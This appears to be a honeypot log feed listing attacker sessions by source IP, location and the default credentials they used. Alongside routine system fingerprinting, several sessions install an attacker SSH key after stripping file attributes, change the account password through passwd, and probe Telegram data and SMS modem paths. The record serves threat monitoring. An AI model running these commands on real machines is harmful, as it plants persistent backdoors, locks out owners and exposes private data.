$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—12
$ /bin/uname -s -v -n -m 2 > /dev/null ร—6
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—6
$ busybox uname -s -v -n -m 2 > /dev/null ร—6
$ ( [ -f /proc/version ] ร—6
$ [ -f /proc/version ] ร—6
$ head -1 /proc/version | cut -d -f1 ร—6
$ [ -f /etc/os-release ] ร—6
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—6
$ uname -m 2 > /dev/null ร—6
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—6
๐ŸŽญ derelict_yankee_root_209 (71.206.190.209) โ€” Richmond, United States ยท 1 session ยท 9 cmds
2026-07-04 05:42 EDT ยท as root/root
root/root login โ†’ network interface enumeration via ifconfig โ†’ OS fingerprinting with uname -a โ†’ hardware profiling via /proc/cpuinfo โ†’ Telegram data directory reconnaissance โ†’ GSM modem device check โ†’ cryptominer process verification โ†’ C2 payload retrieval attempt via locate โ†’ benign echo test
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ unhinged_volcano_root (103.154.77.48) โ€” Sleman, Indonesia ยท 2 sessions ยท 22 cmds
2026-06-23 09:33 EDT ยท as admin/admin123, oracle/1111
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\nWvptwUbQVdhG\nWvptwUbQVdhG"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\nWvptwUbQVdhG\nWvptwUbQVdhG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ clandestine_dragon_root (114.96.79.13) โ€” Hefei, China ยท 1 session ยท 1 cmd
2026-07-04 01:29 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ wily_monsoon_root_14 (38.137.11.14) โ€” Chandigarh, India ยท 1 session ยท 20 cmds
2026-07-04 01:18 EDT ยท as admin/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\nyHOYs6TrNsTV\nyHOYs6TrNsTV"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\nyHOYs6TrNsTV\nyHOYs6TrNsTV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ murky_fika_root (171.25.158.70) โ€” Vaxjo, Sweden ยท 1 session ยท 20 cmds
2026-07-04 01:17 EDT ยท as admin/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\nzeRx9OrnehQQ\nzeRx9OrnehQQ"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\nzeRx9OrnehQQ\nzeRx9OrnehQQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ arctic_static_root (209.99.190.113) โ€” Zurich, Switzerland ยท 1 session ยท 20 cmds
2026-07-04 01:10 EDT ยท as admin/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\nhIzCHfXX8X5M\nhIzCHfXX8X5M"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\nhIzCHfXX8X5M\nhIzCHfXX8X5M\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ haywire_satay_root (149.118.135.252) โ€” Bukit Batu, Malaysia ยท 1 session ยท 9 cmds
2026-07-04 00:58 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ frantic_carnival_root (177.16.244.39) โ€” Salvador, Brazil ยท 1 session ยท 2 cmds
2026-07-03 23:26 EDT ยท as oracle/oracle@12345
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_ximen_root (118.194.252.168) โ€” Taipei, Taiwan ยท 1 session ยท 2 cmds
2026-07-03 21:47 EDT ยท as oracle/rootroot
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_k-pop_root (125.137.115.145) โ€” Dalseo-gu, South Korea ยท 1 session ยท 9 cmds
2026-07-03 19:56 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ gnarled_star_root_225 (172.210.53.225) โ€” Boydton, United States ยท 1 session ยท 1 cmd
2026-07-03 19:45 EDT ยท as root/1234
privilege check
$ whoami
โ†ณ privilege check
๐ŸŽญ molten_chai_root (103.149.197.34) โ€” Pune, India ยท 1 session ยท 1 cmd
2026-07-03 18:32 EDT ยท as root/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ spectral_phantom_root (91.92.40.24) โ€” Varna, Bulgaria ยท 13 sessions ยท 13 cmds
2026-07-03 16:45 EDT ยท as admin/admin, deploy/deploy, oracle/Bmw_20!_^
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—13
๐ŸŽญ placid_wraith_root (91.92.40.233) โ€” Varna, Bulgaria ยท 45 sessions ยท 275 cmds
2026-06-21 09:15 EDT ยท as admin/123456, admin/admin, admin/admin123
OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release detection via /etc/os-release โ†’ uptime verification โ†’ PATH environment hardening โ†’ passive system profiling without privilege escalation or lateral movement
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—8
$ uname -s -v -n -m 2 > /dev/null ร—45
$ /bin/uname -s -v -n -m 2 > /dev/null ร—19
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—19
$ busybox uname -s -v -n -m 2 > /dev/null ร—19
$ ( [ -f /proc/version ] ร—19
$ [ -f /proc/version ] ร—19
$ head -1 /proc/version | cut -d -f1 ร—19
$ [ -f /etc/os-release ] ร—19
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—11
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—26
$ uname -m 2 > /dev/null ร—26
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—26
๐ŸŽญ zealous_shadow_root (91.92.40.204) โ€” Varna, Bulgaria ยท 21 sessions ยท 149 cmds
2026-06-15 09:39 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH export โ†’ uname -s -v -n -m OS fingerprinting โ†’ /proc/version and /etc/os-release checks โ†’ uptime extraction โ†’ hardware profiling via uname -m โ†’ cryptomining potential assessment
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 